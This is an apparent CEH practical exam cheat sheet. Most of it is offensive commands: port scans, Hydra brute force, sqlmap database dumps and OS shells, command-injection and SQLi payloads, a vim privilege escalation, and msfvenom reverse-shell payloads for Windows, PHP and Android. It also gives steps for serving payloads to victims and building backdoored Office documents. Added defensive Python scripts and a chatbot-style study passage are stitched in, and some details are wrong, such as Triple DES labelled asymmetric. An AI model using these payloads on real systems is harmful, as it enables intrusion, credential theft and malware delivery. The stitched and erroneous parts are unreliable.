CEH-v13-cheatsheet

Tools (most commonly used):

- Nmap
- Hydra
- Sqlmap
- John
- Hashcat
- Metasploit
- Wireshark
- Steghide
- OpenStego
- Snow
- Searchsploit
- Aircrack-ng
- VeraCrypt
- HashCalc
- OWASP ZAP
- OpenVAS

Windows commands:

1. `net user` - domain user enumeration
2. `snow.exe -C -p "password" stegfile.txt` - extract a Snow-hidden message from a text file
3. `type C:\path.txt` - displays the content of path.txt
4. `dir`
5. `cd`
6. `hostname`
7. `whoami`
8. `pwd`

Linux tools:

1. Nmap
2. wpscan
3. sqlmap
4. hashcat
5. john
6. Hydra
7. PhoneSploit
8. Metasploit

1) Nmap

```
nmap -sn <target>/24 -oN nmap.txt
nmap -O <target>/24 -oN nmap-OS.txt
nmap -sC -sV -sS <target> -oN nmap-all.txt
```

2) wpscan (`-U` usernames, `-P` password list)

```
wpscan --url http://<target>:8080/CEH/ -U james -P /password.txt
```

3) Hydra

```
hydra -L /user.txt -P /password.txt ftp://<target>
```

4) Metasploit: for any question about NetBIOS or SMB, use Metasploit.

Practice tasks (exam style):

1. SQL injection using sqlmap: perform the injection with sqlmap and extract the password of a specific user.

2. Check which hosts have RDP enabled: port-scan 3389, then run OS discovery against the hosts where it is open and report the OS of the RDP-enabled host.
3. Check which host runs the MySQL service (same technique as task 2, port 3306).
4. Extract the FTP username and password (use Hydra with the wordlist in the Desktop wordlist folder).
5. Recover password.txt from a VeraCrypt volume (disk encryption).
6. Recover a username and password from a capture using Wireshark.
7. Check whether bit 3 is set using Wireshark.
8. Identify the source and destination ports of a traffic flow using Wireshark.
9. Decrypt 3DES-encrypted data using CrypTool.
10. Extract the PIN using OpenStego.
11. Perform steganalysis on a text file using Snow.
12. Brute-force a website login using Burp Suite (Intruder).
13. Crack a hash file using John (the hash file is in the Responder tool's logs folder).
14. Find the flag file on the FTP server (use the credentials cracked in the previous task).
15. Perform remote OS command injection (DVWA) and read the content of the PIN file.
16. Perform a file upload attack (DVWA).
17. Compare MD5 hashes and report which file has been tampered with.
18. Crack a hash file (John the Ripper).
19. Find the trojan and report the port it uses.
20. Perform parameter tampering.

Notes for the 3DES task: the key value is 11. Open the file in CrypTool first, then go to Encryption/Decryption, choose Asymmetric, select Triple DES (ECB), set every key field to 11 and decrypt.

Notes for the command injection task: `snow.exe -C -p "given_password" file_name` extracts the Snow-hidden text. Chaining `| dir c:\` onto the injected command lists the drive and shows pin.txt; to read its content, try `| dir c:\ "pin.txt"` or `| type pin.txt`.

DVWA (Windows) command injection payloads:

- Easy: `127.0.0.1 && net user`, `127.0.0.1 && net user && ver`, `127.0.0.1 && net user && getmac`
- Medium: `127.0.0.1&net user`, `127.0.0.1&net user&sc query&systeminfo`, `127.0.0.1&;&ipconfig`
- High: `127.0.0.1|net user`

DVWA (Windows) file upload:

1. `msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw`; put `GIF98` before the PHP code and save it as shell.jpeg.
2. Upload the file and copy the uploaded path.
3. In Command Injection, run `|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php`
4. In msfconsole: `use multi/handler`, `set payload php/meterpreter/reverse_tcp`, `set lhost <IP>`, `set lport <port>`, `run`

```
net user
snow.exe -C -p "given_password" file_name
```

---

```
wpscan --url http://10.10.10.12:8080/CEG --enumerate u
```

```
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set PASS_FILE /root/Desktop/wordlists/Passwords.txt
set RHOSTS 10.10.10.12
set RPORT 8080
set TARGETURI http://10.10.10.12:8080/CEH/
set USERNAME admin
run
```

---

Find hosts with FTP, RDP or MySQL open (save the scan, then grep the "open" line together with the host header above it):

```
nmap -Pn -p 21 <target-range> > ftp
grep -B 5 open ftp

nmap -Pn -p 3389 <target-range> > rdp
grep -B 5 open rdp

nmap -Pn -p 3306 <target-range> > mysql
grep -B 5 open mysql
```
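The `grep -B 5 open` trick only works while the open line sits within five lines of its "Nmap scan report for" header. The script below is an added example, not part of this cheat sheet: it parses Nmap normal (`-oN`) output host by host and returns the addresses that actually have the port open, so the same check works for any scan size. The scan text embedded in it is constructed to look like a `-p 3389` sweep.

```python
"""Parse Nmap normal output (-oN) and list the hosts with a given port open.

Added example for the cheat sheet above; the sample scan text is constructed.
"""
import re
from typing import Dict, List

# Constructed sample of `nmap -Pn -p 3389 10.10.10.0/29 -oN rdp.txt` output.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -Pn -p 3389 -oN rdp.txt 10.10.10.0/29
Nmap scan report for 10.10.10.1
Host is up (0.00042s latency).

PORT     STATE    SERVICE
3389/tcp closed   ms-wbt-server

Nmap scan report for dc01.lab.local (10.10.10.2)
Host is up (0.00051s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 10.10.10.3
Host is up (0.00039s latency).

PORT     STATE    SERVICE
3389/tcp filtered ms-wbt-server

# Nmap done at Mon Jan  1 10:00:02 2024 -- 8 IP addresses (3 hosts up) scanned in 2.10 seconds
"""

# Host header: "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)".
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+\.\d+\.\d+\.\d+)\)?"
)
# Port line: "3389/tcp open  ms-wbt-server".
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_nmap_normal(text: str) -> Dict[str, List[dict]]:
    """Return {ip: [{port, proto, state, service}, ...]} for every host block."""
    hosts: Dict[str, List[dict]] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip")
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
            })
    return hosts


def hosts_with_open_port(text: str, port: int, proto: str = "tcp") -> List[str]:
    """IPs whose scan block lists `port/proto` in state `open`, sorted."""
    return sorted(
        ip
        for ip, ports in parse_nmap_normal(text).items()
        if any(p["port"] == port and p["proto"] == proto and p["state"] == "open"
               for p in ports)
    )


if __name__ == "__main__":
    print("RDP exposed on:", hosts_with_open_port(SAMPLE_NMAP_OUTPUT, 3389))
```

Feed it a real `-oN` file with `hosts_with_open_port(open("rdp.txt").read(), 3389)`; filtered and closed ports are kept in the parsed structure, which is useful when documenting what was exposed and what was not.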

```
hydra -l james -P given_wordlist ftp://target
```

SNMP Enumeration

```
nmap -sU -p 161 <IP>
snmp-check <IP>
```

snmp-check displays network info, network interfaces, IP addresses, routing info, TCP connections and listening ports, processes, storage, file system and device info.

NetBios Enumeration

```
nbtstat -a <IP>
```

- `-a`: NetBIOS name table of the remote machine
- `-c`: list the contents of the local NetBIOS name cache

```
NET USERS /DOMAIN > USERS.TXT
```

Domain: TEST.local

User enumeration (Windows):

```
net user
net user /domain
net user [username]
net user [username] /domain
```

OWASP ZAP: open ZAP, add the website to Automated Scan, then open the Alerts tab to review the vulnerabilities found.


SQL MAP

Open the vulnerable website, copy the cookie from the browser's inspect element, then open a terminal and run sqlmap:

```
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump
```

This dumps all the usernames and passwords of the website.

```
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
```

`--os-shell` opens an interactive OS shell.

Once you have a username and password for the database, connect to it directly (`-u` user, `-p` prompts for the password):

```
mysql -u qdpmadmin -h 192.168.1.8 -p
show databases;
use qdpm;
show tables;
select * from users;
show databases;
use staff;
show tables;
select * from login;
select * from user;
```

```
nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt
```

```
nmap -sn -O 172.16.43.1/24
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24
nmap -sV -sC -A 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.1
nmap -f <IP>
nmap -sn -PR <IP>
nmap -sn -PE <ip-range>
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O <IP>
nmap -A <IP>
```

- `-sn`: disable the port scan (host discovery only)
- `-PR`: ARP ping scan
- `-PU`: UDP ping scan
- `-PE`: ICMP echo ping scan
- `-f`: split packets into IP fragments

```
nmap --script smb-os-discovery.nse <IP>
```

Displays OS, computer name, domain, workgroup and ports.

Wireshark filters for a DoS (SYN flood): `tcp.flags.syn == 1`, or `tcp.flags.syn == 1 and tcp.flags.ack == 0` for SYNs without ACK. To find submitted passwords: `http.request.method == POST`.

```
wpscan --url http://<IP>:8080/CEH/ -U james -P /path/pass.txt
wpscan --url https://example/ --enumerate u     # enumerate users
netdiscover -i eth0                              # discover devices on the network through eth0
nmap -sN 10.10.10.0/24                           # enumeration (TCP null scan)
netstat -a                                       # list connections and listening ports on the local host
snmp-check 10.10.10.10                           # SNMP enumeration
enum4linux 10.10.10.10                           # extract users over NetBIOS/SMB (Parrot)
```

```
sudo nmap -vv -p 1-1000 -sC -A 10.10.10.10 -oN nmap_scan
nmap -p- -sS --min-rate 10000 -Pn -n <IP>
nmap -6 www.scanme.com                                  # scan IPv6
nmap -sC -sV -vvv -T5 -p 80,21,2222 <IP>
sudo nmap -v -sV -sC <IP>
nmap -Pn -sS -n <IP> -T4 -oN nmap_scan                  # [preferred] fast scan
nmap -v -p- -sV -sC -T4 <IP> -oN nmap_scan              # TCP scan of all ports with scripts
sudo nmap -p- -Pn -vvv -sS <IP> -oN nmap_scan
nmap -sS -sV -A -O -Pn <IP>
nmap -sV -sT -sU -A <IP> -oN nmap_scan                  # TCP connect + UDP scan
sudo nmap -p- <IP> --open -oG nmap/AllPorts -vvv -Pn -n -sS
sudo nmap -p22,80 -sV -sC -Pn -n <IP> -oN nmap/openports -vvv
nmap -sV -p 22,443 <IP>/24                              # scan my /24 network
nmap -sU -p 161 -sV -sC <IP>                            # UDP scan
nmap -A --min-rate=5000 --max-retries=5 <IP>            # optimize scan time
nmap -Pn -sS -A -oX test 10.10.10.0/24                  # scan the network/subnet and save XML
```

SNMP scripts (port 161) extract the users of the network.

Flag reference:

- `-PR`: ARP ping scan
- `-PE`: ICMP echo ping scan
- `-PU`: UDP ping scan
- `-oX`: save as XML
- `-vv`: verbose
- `-p`: ports
- `-sC`: default scripts
- `-A`: aggressive scan (OS detection, version detection, script scanning, traceroute)
- `-oN`: save in normal format to a file
- `-sS`: SYN scan; less intrusive because it never completes the TCP handshake
- `-n`: no DNS resolution
- `-p-`: all ports
- `-sV`: probe open ports to determine service/version info
- `-T4`: timing template (1-5)
- `-o*`: output formats for saving the scan
- `-sT`: TCP connect scan
- `-sU`: UDP port scan
- `--open`: show only open ports
- `-oG`: save in grepable format
- `-Pn`: skip host discovery (no ping)
- `--max-retries`: port-probe retransmissions (the default is 10)
- `-O`: OS detection

My methodology:

```
nmap -sV -sC 10.10.10.x                            # top 1000 ports
nmap -sC -sV -v -oN nmap.txt 10.10.10.x
masscan -e tun0 -p1-65535 --rate=1000 10.10.10.x
sudo nmap -sU -sV -A -T4 -v -oN udp.txt <IP>
```

Common ports:

| Port | Service | Notes |
| --- | --- | --- |
| 3306 | mysql | `--script mysql-info,mysql-enum` |
| 3389 | rdp | remote desktop |
| 25 | smtp | mail |
| 80 | http | |
| 443 | https | |
| 20 | ftp | data channel (21 is the control channel) |
| 23 | telnet | |
| 143 | imap | |
| 22 | ssh | |
| 53 | dns | |

Directory enumeration:

```
gobuster dir -u <IP> -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q
```

- `dir`: directory listing mode
- `-u`: host
- `-w`: wordlist
- `-t`: number of concurrent threads (default 10)
- `-x`: file extensions to look for (htm, php, ...)
- `-q`: `--quiet`, don't print the banner and other noise

WordPress enumeration:

```
wpscan --url https://localchost.com --passwords=<wordlist>
wpscan -u <IP> -e u,vp
wpscan -u <IP> -e u --passwords path/rockyou.txt      # brute force
```

- `-e`: enumerate; `u` = usernames, `vp` = vulnerable plugins

Wordlist generation:

```
cewl -w wordlist -d 2 -m 5 http://wordpress.com
```

- `-d`: depth of the crawl
- `-m`: minimum word length
- `-w`: save to a file (wordlist)

SQL injection:

```
sqlmap -u http://10.10.197.40/administrator.php --forms --dump
```

- `-u`: URL
- `--forms`: grab the forms and test them
- `--dump`: retrieve data through the SQLi

Basic SQLi:

```
sqlmap -u 10.10.77.169 --forms --dump
```

```
sqlmap -u http://localchost.com/hey.php?artist=1 --dbs                                                # extract databases
sqlmap -u http://localchost.com/hey.php?artist=1 -D <db> -T artists --columns                         # extract columns
sqlmap -u http://localchost.com/hey.php?artist=1 -D <db> -T artist -C adesc,aname,artist_id --dump    # extract the data of the given columns
enum4linux 10.10.60.11
hydra -t4 -l lin -P /usr/share/wordlists/rockyou.txt ssh://10.10.149.11
hydra -l lin -P /usr/share/wordlists/rockyou.txt ssh://10.10.149.118
exiftool cats.png
zsteg cats.png
binwalk -d cats.png
```

Windows:

```
snow -C -p "magic" readme2.txt      # -p = password
```

Image steganography: OpenStego > Extract Data. stegseek cracks the steghide passphrase of an image.

```
rpcclient 10.10.123.10
hashcat -O -w 3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt --show
```

- `-m`: hash type
- `-a`: attack mode (0-3); 3 = brute force (mask)
- `--show`: show the cracked hash

```
hashcat -O -a 0 -m 20 salt12314124:passwordmd523432 /usr/share/wordlists/rockyou.txt
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show
```

HashCalc: open a file in HashCalc and it gives you its MD5 (or other algorithm) hash.

MD5 calculator: compares two files; what we need is the MD5 of each.

HashMyFiles: hashes all the files inside a folder.
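The tamper-detection task (compare hashes, report the modified file) is what HashCalc, MD5 calculator and HashMyFiles do by hand. The script below is an added example, not from this cheat sheet: it snapshots a directory into a manifest of digests, then re-hashes and reports every file whose digest changed or that went missing. The files and manifest are constructed in a temporary directory so it runs offline; the algorithm defaults to SHA-256, with `"md5"` available for the exam's MD5 comparison.

```python
"""Detect tampered files by comparing digests against a known-good manifest.

Added example; the sample files are constructed in a temporary directory.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def file_digest(path: Path, algorithm: str = "sha256") -> str:
    """Hex digest of a file, hashed in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path, algorithm: str = "sha256") -> Dict[str, str]:
    """Map every regular file under root (relative path) to its digest."""
    return {
        str(p.relative_to(root)): file_digest(p, algorithm)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def tampered_files(root: Path, manifest: Dict[str, str],
                   algorithm: str = "sha256") -> List[str]:
    """Relative paths whose current digest differs from the manifest, plus missing files."""
    changed = []
    for rel, expected in manifest.items():
        p = root / rel
        if not p.is_file() or file_digest(p, algorithm) != expected:
            changed.append(rel)
    return sorted(changed)


def demo(algorithm: str = "sha256") -> List[str]:
    """Constructed scenario: snapshot three files, modify one, report which changed."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in (("a.txt", b"alpha"), ("b.txt", b"bravo"), ("c.txt", b"charlie")):
            (root / name).write_bytes(body)
        manifest = build_manifest(root, algorithm)        # known-good snapshot
        (root / "b.txt").write_bytes(b"bravo-modified")   # simulated tampering
        return tampered_files(root, manifest, algorithm)


if __name__ == "__main__":
    print("tampered:", demo())
```

MD5 is enough to spot accidental corruption or the lab's deliberately edited file, but MD5 collisions are practical, so a manifest meant to stop a deliberate substitution should use SHA-256 and be stored somewhere the attacker cannot rewrite.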

Rainbow tables are precomputed hash/password pairs, used to crack hashes without computing new ones.

```
# linux (rainbowcrack): generate a new rainbow table
rtgen sha256 loweralpha-numeric 1 10 0 1000 4000 0
# windows
rtgen md5 loweralpha-numeric 1 4 1 1000 1000 0
```

Then use the RainbowCrack app: add the hashes and the rainbow table, and search.

Search a tool's help for an option:

```
smbmap --help | grep -i username
smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"     # -x = command to run
```

wireshark filters

Filters:

- `http.request.method == POST` - form submissions (passwords)
- `smtp`, `pop` - email
- `dns.qry.type == 1` - A-record queries; with tshark add `-T fields -e dns.qry.name` to list the names present in the pcap
- `dns.flags.response == 0` - queries only (the lab capture had 56 unique DNS queries)
- `tcp` - show TCP packets
- Find packets: Edit > Find Packet, search in packet list / packet bytes, case sensitive, type String, string "pass"

DDoS attack: look at the packet counts in the first column, then Statistics > IPv4 Statistics > Destinations and Ports.
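The SYN-flood filter (`tcp.flags.syn == 1 and tcp.flags.ack == 0`) and the Statistics view amount to counting half-open SYNs per source and looking for the outlier. The script below is an added example, not from this cheat sheet, that does exactly that over a list of packet records so the rule can run in a script instead of by eye; the packets are constructed (one flooding source, two clients completing normal handshakes) and the threshold is an assumed value.

```python
"""Spot a SYN-flood source by counting bare SYNs (SYN set, ACK clear) per source.

Added example; the packet records are constructed.
"""
from collections import Counter
from typing import Dict, Iterable, List, NamedTuple


class Packet(NamedTuple):
    """Minimal view of a TCP packet: who sent it, to where, and the SYN/ACK flags."""
    src: str
    dst: str
    dport: int
    syn: bool
    ack: bool


def constructed_capture() -> List[Packet]:
    """Constructed traffic: 10.10.10.66 sends 500 bare SYNs; two clients complete handshakes."""
    pkts: List[Packet] = []
    for _ in range(500):
        pkts.append(Packet("10.10.10.66", "10.10.10.10", 80, syn=True, ack=False))
    for client in ("10.10.10.21", "10.10.10.22"):
        pkts.append(Packet(client, "10.10.10.10", 80, syn=True, ack=False))   # SYN
        pkts.append(Packet("10.10.10.10", client, 80, syn=True, ack=True))    # SYN-ACK
        pkts.append(Packet(client, "10.10.10.10", 80, syn=False, ack=True))   # ACK
    return pkts


def bare_syn_counts(pkts: Iterable[Packet]) -> Dict[str, int]:
    """The Wireshark filter in code: count packets with SYN=1 and ACK=0, per source address."""
    return Counter(p.src for p in pkts if p.syn and not p.ack)


def syn_flood_sources(pkts: Iterable[Packet], threshold: int = 100) -> List[str]:
    """Sources whose bare-SYN count exceeds the (assumed) threshold, highest count first."""
    counts = bare_syn_counts(pkts)
    return [src for src, n in counts.most_common() if n > threshold]


if __name__ == "__main__":
    capture = constructed_capture()
    print("bare SYNs per source:", dict(bare_syn_counts(capture)))
    print("flood sources:", syn_flood_sources(capture))
```

On a real capture the `Packet` records would come from `tshark -r file.pcap -T fields -e ip.src -e ip.dst -e tcp.dstport -e tcp.flags.syn -e tcp.flags.ack`; a normal client contributes one bare SYN per connection, so the threshold separates it from a flooder by orders of magnitude.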

tshark (CLI):

```
tshark -r dns.cap | wc -l                                                       # count the packets in a capture
tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name             # show the names queried in this pcap
tshark -r dnsexfil.pcap -Y "dns.flags.response == 0" | wc -l                   # count queries only
tshark -r pcap -T fields -e dns.qry.name | sort | uniq | wc -l                  # count unique queries (56 in the lab pcap)
tshark -r pcap | head -n2                                                       # find the DNS server side to identify "special" queries
tshark -r pcap -Y "dns.flags.response == 0" -T fields -e "dns.qry.name" | sed "s/.m4lwhere.org//g" | tr -d "\n"   # reassemble data exfiltrated over DNS; refine with a regex
```

```
ssh -p 2222 mith@10.10.123.23
sudo -l            # list sudo permissions
```
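The DNS pipeline above (list queries, count unique names, strip the zone suffix, look for "special" queries) is a manual exfiltration triage. The script below is an added example, not from this cheat sheet, that does the same in Python over a list of query names as `tshark -T fields -e dns.qry.name` would print them, and adds the two indicators a defender checks next: unusually long first labels and high label entropy, both typical of encoded data chunks. The query list is constructed and `exfil.example` is a placeholder zone.

```python
"""Triage DNS query names for exfiltration indicators.

Added example; the query names are constructed and exfil.example is a placeholder zone.
"""
import math
from collections import Counter
from typing import Dict, List

# Constructed query names, one per line as `tshark -T fields -e dns.qry.name` prints them.
CONSTRUCTED_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "www.example.com",
    "4d6167696320776f726473.exfil.example",
    "2068657265206172652073.exfil.example",
    "6f6d65206d6f7265206279.exfil.example",
    "cdn.example.com",
]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def query_stats(queries: List[str]) -> Dict[str, int]:
    """Total and unique counts, like `| wc -l` and `| sort | uniq | wc -l` in the tshark pipeline."""
    return {"total": len(queries), "unique": len(set(queries))}


def strip_zone(name: str, zone: str) -> str:
    """Remove the trailing zone (the `sed "s/.zone//"` step), leaving only the leading labels."""
    suffix = "." + zone
    return name[:-len(suffix)] if name.endswith(suffix) else name


def suspicious_queries(queries: List[str], zone: str,
                       max_label_len: int = 16, min_entropy: float = 3.0) -> List[str]:
    """Names under `zone` whose first label is long or high-entropy (assumed thresholds)."""
    flagged = []
    for name in sorted(set(queries)):
        if not name.endswith("." + zone):
            continue
        label = strip_zone(name, zone).split(".")[0]
        if len(label) > max_label_len or shannon_entropy(label) >= min_entropy:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print(query_stats(CONSTRUCTED_QUERIES))
    print("suspicious:", suspicious_queries(CONSTRUCTED_QUERIES, "exfil.example"))
    # The stripped labels are the exfiltrated chunks; decoding them is the next step.
    print([strip_zone(q, "exfil.example") for q in suspicious_queries(CONSTRUCTED_QUERIES, "exfil.example")])
```

Ordinary hostnames such as `www` or `mail` are short and low-entropy, so they pass both checks; a zone whose queries are almost all flagged is the one to investigate in the capture.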

```
sudo vim -c ':!/bin/sh'                          # privilege escalation via sudo-allowed vim
hydra -l root -P passwords.txt [-t 32] ftp://<IP>
hydra -L usernames.txt -P pass.txt mysql://<IP>
hashcat.exe -m <hash-type> hash.txt rockyou.txt -O
nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
wpscan --url https://10.10.10.10 --enumerate u
netdiscover -i eth0
john --format=raw-md5 password.txt               # recover the plaintext password
nikto -h <url> -Cgidirs all
```

System hacking

1. On a Windows machine:

```
wmic useraccount get name,sid          # list users
Pwdump7.exe > /path/file.txt           # dump the hashes to a file to crack
```

Crack them with ophcrack using rainbow tables: ophcrack > Tables > Vista free. To build your own table, use winrtgen (winrtgen > Add Table > hashntlm), then in RainbowCrack select the obtained hash file and the directory created with winrtgen.

2. Use Responder to capture the traffic of a Windows system (set up a shared folder on Windows, capture the NTLM hash, then crack it with john):

```
chmod +x Responder.py
./Responder.py -I eth0       # -I = interface (check with ifconfig)
john capture.txt             # crack the captured NTLM hash
```

L0phtCrack helps crack NTLM password hashes stored on Windows.

System hacking (Windows): look for an exploit and try to get remote access to the victim using msfvenom, Metasploit and a RAT.

```
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
```

- `-p`: payload
- `--platform`: OS
- `-a`: architecture
- `-f`: payload format
- `-o`: output file

Now share the file with the victim; three options:

```
# option 1: apache
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /root/Desktop/test.exe /var/www/html/share      # copy test.exe to the new web root
service apache2 start                                # start the server with apache
# option 2: python 2
python -m SimpleHTTPServer 80
# option 3: python 3
python3 -m http.server 80
```

Then open msfconsole to receive the reverse shell with meterpreter:

```
use exploit/multi/handler            # similar to nc -nlvp <port>
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port
exploit                              # or run
```

Share the file with the victim (my.ip/share); when test.exe is run on the victim's machine, a session opens in Metasploit. `sysinfo` shows the system info.

Next, enumerate misconfigurations on the Windows 10 system with PowerSploit's PowerUp:

```
upload /path/PowerUp.ps1 powerup.ps1                                    # from the meterpreter session
shell                                                                   # switch from meterpreter to a windows shell
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
```

The checks show that Windows is vulnerable to DLL injection. Return to meterpreter with `exit`, then `run vnc` opens a VNC remote control of the victim.

Another method to gain access to a machine: TheFatRat.

```
chmod +x fatrat
chmod +x setup.sh
chmod +x powerfull.sh
./setup.sh
```

Run fatrat: option 6 (create FUD backdoor) > option 3 (create apache + ps1), enter LHOST and LPORT, enter the name for the files (payload), option 3 to choose meterpreter/reverse_tcp; the payload is generated. Option 9 goes back to the menu; option 7 (create a backdoored Office document) > option 2 (macro, Windows), set LHOST and LPORT, enter the name for the doc file, answer Y to use a custom exe backdoor, option 3 (reverse_tcp); the document with the backdoor inside is generated.

Share the document using options 1 and 2 above, then start msfconsole to get the meterpreter shell:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port
exploit
```

Create an Android backdoor with msfvenom:

```
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=my.ip R > path/backdoor.apk
```

Share it with one of the three methods above, then in Metasploit:

```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST my.ip
exploit -j -z          # run the exploit as a background job
sessions -i 1          # once the apk is installed on the phone the session opens
sysinfo                # identify the OS
```

Using PhoneSploit: run phonesploit, choose option 3 (new phone) and enter the phone's IP, then option 4 for a shell on the phone. The menu also lets you search, download and get info.

Using the methodology:

1. `netdiscover -i eth0`
2. `nmap -p- 10.10.10.10` (any IP) for port discovery
3. `nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10`
4. `gobuster dir -e -u http://10.10.10.10 -w wordlist.txt` when a web server is running
5. Try SQLi payloads on the forms:

```
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
```

Brute-forcing servers:

```
hydra -l root -P passwords.txt [-t 32] ftp://<IP>
hydra -L usernames.txt -P pass.txt mysql://<IP>
hydra -l USERNAME -P /path/to/passwords.txt -f pop3://<IP> -V
hydra -V -f -L <users> -P <passwords> rdp://<IP>
hydra -P common-snmp-community-strings.txt target.com snmp
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
hydra -l root -P passwords.txt ssh://<IP>
```

Custom wordlist:

```
cewl example.com -m 5 -w words.txt
```

Search for vulns:

```
searchsploit 'Linux Kernel'
searchsploit -m 7618           # copy the exploit into the current directory
searchsploit -p 7618[.c]       # show the complete path
searchsploit --nmap file.xml   # search for vulns from an Nmap XML result
```

sqlmap:

```
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch
```

Hash identification and hash cracking

Hash identifier: https://www.onlinehashcrack.com/hash-identification.php or `hash-identifier` (CLI).

Hash cracking sites: https://crackstation.net/ and https://hashes.com/en/decrypt/hash

```
hashcat -a 0 -m 900 hash.txt /rockyou.txt
```

`-a` is the attack mode (0 = dictionary; 3 = mask brute force, which takes a mask rather than a wordlist) and `-m` the hash type:

| Mode | Hash type |
| --- | --- |
| 900 | MD4 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 110 | SHA1 with salt |
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 3200 | bcrypt |
| 160 | HMAC-SHA1 |

John

1. First identify the hash type: `john hashfile.hash`
2. Then crack the hash: `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
3. Show the cracked password: `john --show --format=Raw-SHA1 hashfile.hash` or `john --show hashfile.hash`


Since you're preparing for the CEH Practical, precision and methodical execution are key. These tasks cover the core pillars of the exam: scanning, enumeration, system hacking, and wireless/forensic analysis. Below are the step-by-step methodologies and commands for each scenario.

---

1. Identify the Domain Controller product version. To find the specific version (e.g. Windows Server 2019), use Nmap with service detection.
   - Command: `nmap -sV -Pn --script=smb-os-discovery <IP>`
   - Logic: look for the Service column and the OS generation in the output. `-sV` probes open ports to determine service/version info.
2. Identify the OS running MySQL. MySQL typically runs on port 3306.
   - Command: `nmap -p 3306 -O <IP>`
   - Logic: `-O` triggers OS fingerprinting. If the OS is obscured, check the TTL (Time to Live) in a ping: 128 usually indicates Windows, while 64 indicates Linux.
3. FTP password cracking (user X). If you have a wordlist (like rockyou.txt), use Hydra.
   - Command: `hydra -l X -P /path/to/wordlist.txt ftp://<IP>`
   - Logic: `-l` specifies the known username; `-P` points to your password list.
4. Find an employee phone number (OSINT/data mining). On the CEH exam this is usually found by searching a compromised machine's files or using specific tools.
   - Search for .txt, .docx or .pdf files: `find / -name "*.txt" 2>/dev/null`
   - Check for a "Contacts" or "Staff" folder.
   - If it is on a website, use cewl to scrape for data: `cewl -d 2 -m 5 http://<site>`
5. Crack a WPA2 password (capture.cap).
   - Command: `aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt`
